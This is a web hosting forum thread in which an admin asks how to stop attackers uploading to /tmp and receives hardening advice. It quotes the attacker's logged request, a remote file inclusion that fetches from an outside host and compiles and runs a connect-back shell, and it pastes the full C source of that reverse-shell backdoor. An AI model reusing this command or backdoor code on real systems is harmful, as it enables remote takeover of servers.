Results 1 to 4 of 4

Thread: Backdoor

  1. #1
    Join Date
    Aug 2002
    Posts
    1,633

    Backdoor

    Hi

    today i have found a file in my tmp directory that i have make a snosuexec and nosuid i have also the compilers disable, how can i stop peoples to upload in the TMP folder?

    they get access from:

    "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://exploit.webcindario.com/cse.gif?&cmd=cd%20/tmp/;gcc%20-o%20dc-connectback%20dc-connectback.c;./dc-connectback%20200.199.178.13%2080

    Do you think that he have execute it?

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    int main(int argc, char **argv) {
    char *host;
    int port = 80;
    int f;
    int l;
    int sock;
    struct in_addr ia;
    struct sockaddr_in sin, from;
    struct hostent *he;
    char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
    "Issue \"export TERM=xterm; exec bash -i\"\n"
    "For More Reliable Shell.\n"
    "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
    "For Not Getting Logged.\n(;\n\n";
    printf("Data Cha0s Connect Back Backdoor\n\n");
    if (argc < 2 || argc > 3) {
    printf("Usage: %s [Host] <port>\n", argv[0]);
    return 1;
    }
    printf("[*] Dumping Arguments\n");
    l = strlen(argv[1]);
    if (l <= 0) {
    printf("[-] Invalid Host Name\n");
    return 1;
    }
    if (!(host = (char *) malloc(l))) {
    printf("[-] Unable to Allocate Memory\n");
    return 1;
    }
    strncpy(host, argv[1], l);
    if (argc == 3) {
    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
    printf("[-] Invalid Port Number\n");
    return 1;
    }
    }
    printf("[*] Resolving Host Name\n");
    he = gethostbyname(host);
    if (he) {
    memcpy(&ia.s_addr, he->h_addr, 4);
    } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
    printf("[-] Unable to Resolve: %s\n", host);
    return 1;
    }
    sin.sin_family = PF_INET;
    sin.sin_addr.s_addr = ia.s_addr;
    sin.sin_port = htons(port);
    printf("[*] Connecting...\n");
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("[-] Socket Error\n");
    return 1;
    }
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
    printf("[-] Unable to Connect\n");
    return 1;
    }
    printf("[*] Spawning Shell\n");
    f = fork( );
    if (f < 0) {
    printf("[-] Unable to Fork\n");
    return 1;
    } else if (!f) {
    write(sock, msg, sizeof(msg));
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    execl("/bin/sh", "shell", NULL);
    close(sock);
    return 0;
    }
    printf("[*] Detached\n\n");
    }
    printf("[*] Detached\n\n");
    return 0;
    }

  2. #2
    Join Date
    Jul 2002
    Posts
    3,734

  3. #3
    Join Date
    Aug 2002
    Posts
    1,633
    yes i know but customers seem that dont like update... as i told is there any way to stop user to upload in TMP?

  4. #4
    Join Date
    Jul 2002
    Posts
    3,734
    Use mod_security, disable wget, etc, maybe firewall outgoing traffic on port 80...there are a number of things.

    If your customers won't upgrade, suspend them. Not upgrading to fix a problem like that isn't an option they should have.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •